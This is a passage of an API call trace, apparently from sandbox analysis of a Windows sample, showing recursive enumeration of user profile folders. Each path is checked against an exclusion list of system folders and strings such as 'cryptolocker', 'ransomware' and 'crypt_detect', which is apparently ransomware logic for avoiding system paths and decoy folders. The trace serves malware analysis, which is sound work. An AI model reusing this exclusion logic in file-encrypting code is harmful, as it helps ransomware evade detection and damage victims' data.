lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\boot\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\programdata\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\drivers\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\wsus\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="crypt_detect") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="cryptolocker") returned 0x0 [0119.187] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="ransomware") returned 0x0 [0119.187] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0119.187] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.187] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="C:\\Program Files") returned 0x0 [0119.187] GetProcessHeap () returned 0xe30000 [0119.187] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xef3600 [0119.187] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default\\Pictures", cchMax=1076 | out: psz1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0119.187] StrNCatW (in: psz1="C:\\Users\\Default\\Pictures", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Default\\Pictures\\*") returned="C:\\Users\\Default\\Pictures\\*" [0119.187] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec18b0 [0119.187] StrCmpW (psz1=".", psz2=".") returned 0 [0119.187] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.187] StrCmpW (psz1="..", psz2=".") returned 1 [0119.187] StrCmpW (psz1="..", psz2="..") returned 0 [0119.187] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0119.187] FindClose (in: hFindFile=0xec18b0 | out: hFindFile=0xec18b0) returned 1 [0119.187] GetProcessHeap () returned 0xe30000 [0119.187] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.187] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0119.187] StrCmpW (psz1="PrintHood", psz2=".") returned 1 [0119.187] StrCmpW (psz1="PrintHood", psz2="..") returned 1 [0119.187] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0119.187] StrCmpW (psz1="Recent", psz2=".") returned 1 [0119.187] StrCmpW (psz1="Recent", psz2="..") returned 1 [0119.187] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0119.187] StrCmpW (psz1="Saved Games", psz2=".") returned 1 [0119.187] StrCmpW (psz1="Saved Games", psz2="..") returned 1 [0119.187] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0119.187] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0119.187] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Saved Games", cchMax=1058 | out: psz1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\system32\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\system\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\appdata\\local\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\boot\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\perflogs\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\programdata\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\drivers\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\wsus\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="crypt_detect") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="cryptolocker") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="ransomware") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="C:\\WINDOWS") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.188] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="C:\\Program Files") returned 0x0 [0119.188] GetProcessHeap () returned 0xe30000 [0119.188] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ba) returned 0xef3600 [0119.188] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default\\Saved Games", cchMax=1082 | out: psz1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0119.188] StrNCatW (in: psz1="C:\\Users\\Default\\Saved Games", psz2="\\*", cchMax=1082 | out: psz1="C:\\Users\\Default\\Saved Games\\*") returned="C:\\Users\\Default\\Saved Games\\*" [0119.188] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1df0 [0119.188] StrCmpW (psz1=".", psz2=".") returned 0 [0119.188] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.189] StrCmpW (psz1="..", psz2=".") returned 1 [0119.189] StrCmpW (psz1="..", psz2="..") returned 0 [0119.189] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0119.189] FindClose (in: hFindFile=0xec1df0 | out: hFindFile=0xec1df0) returned 1 [0119.189] GetProcessHeap () returned 0xe30000 [0119.189] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.189] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0119.189] StrCmpW (psz1="SendTo", psz2=".") returned 1 [0119.189] StrCmpW (psz1="SendTo", psz2="..") returned 1 [0119.189] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0119.189] StrCmpW (psz1="Start Menu", psz2=".") returned 1 [0119.189] StrCmpW (psz1="Start Menu", psz2="..") returned 1 [0119.189] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0119.189] StrCmpW (psz1="Templates", psz2=".") returned 1 [0119.189] StrCmpW (psz1="Templates", psz2="..") returned 1 [0119.189] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0119.189] StrCmpW (psz1="Videos", psz2=".") returned 1 [0119.189] StrCmpW (psz1="Videos", psz2="..") returned 1 [0119.189] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0119.189] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0119.189] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Videos", cchMax=1058 | out: psz1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0119.189] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\system32\\") returned 0x0 [0119.189] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.189] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\system\\") returned 0x0 [0119.189] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.189] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.189] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\appdata\\local\\") returned 0x0 [0119.189] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.189] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.189] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.189] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\boot\\") returned 0x0 [0119.189] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\perflogs\\") returned 0x0 [0119.189] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\programdata\\") returned 0x0 [0119.190] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\drivers\\") returned 0x0 [0119.190] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\wsus\\") returned 0x0 [0119.190] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.190] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.190] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="crypt_detect") returned 0x0 [0119.190] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="cryptolocker") returned 0x0 [0119.190] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="ransomware") returned 0x0 [0119.190] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="C:\\WINDOWS") returned 0x0 [0119.190] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.190] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="C:\\Program Files") returned 0x0 [0119.190] GetProcessHeap () returned 0xe30000 [0119.190] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xef3600 [0119.190] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default\\Videos", cchMax=1072 | out: psz1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0119.190] StrNCatW (in: psz1="C:\\Users\\Default\\Videos", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\Default\\Videos\\*") returned="C:\\Users\\Default\\Videos\\*" [0119.190] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec18b0 [0119.190] StrCmpW (psz1=".", psz2=".") returned 0 [0119.190] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.190] StrCmpW (psz1="..", psz2=".") returned 1 [0119.190] StrCmpW (psz1="..", psz2="..") returned 0 [0119.190] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0119.190] FindClose (in: hFindFile=0xec18b0 | out: hFindFile=0xec18b0) returned 1 [0119.191] GetProcessHeap () returned 0xe30000 [0119.191] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.191] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0119.191] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0119.191] GetProcessHeap () returned 0xe30000 [0119.191] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0119.191] FindNextFileW (in: hFindFile=0xec1d30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd7b844b1, ftCreationTime.dwHighDateTime=0x1d2a02f, ftLastAccessTime.dwLowDateTime=0xd7b844b1, ftLastAccessTime.dwHighDateTime=0x1d2a02f, ftLastWriteTime.dwLowDateTime=0xd7b844b1, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0119.191] StrCmpW (psz1="Default User", psz2=".") returned 1 [0119.191] StrCmpW (psz1="Default User", psz2="..") returned 1 [0119.191] FindNextFileW (in: hFindFile=0xec1d30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc40864ff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default.migrated", cAlternateFileName="DEFAUL~1.MIG")) returned 1 [0119.191] StrCmpW (psz1="Default.migrated", psz2=".") returned 1 [0119.191] StrCmpW (psz1="Default.migrated", psz2="..") returned 1 [0119.191] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0119.191] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0119.191] StrNCatW (in: psz1="C:\\Users\\", psz2="Default.migrated", cchMax=1042 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0119.191] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\system32\\") returned 0x0 [0119.191] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.191] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\system\\") returned 0x0 [0119.191] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.191] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\appdata\\local\\") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\boot\\") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\perflogs\\") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\programdata\\") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\drivers\\") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\wsus\\") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="crypt_detect") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="cryptolocker") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="ransomware") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="C:\\WINDOWS") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.192] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="C:\\Program Files") returned 0x0 [0119.192] GetProcessHeap () returned 0xe30000 [0119.192] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0x6874278 [0119.192] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default.migrated", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0119.192] StrNCatW (in: psz1="C:\\Users\\Default.migrated", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\*") returned="C:\\Users\\Default.migrated\\*" [0119.192] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc40864ff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1eb0 [0119.197] StrCmpW (psz1=".", psz2=".") returned 0 [0119.197] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc40864ff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7205420a, 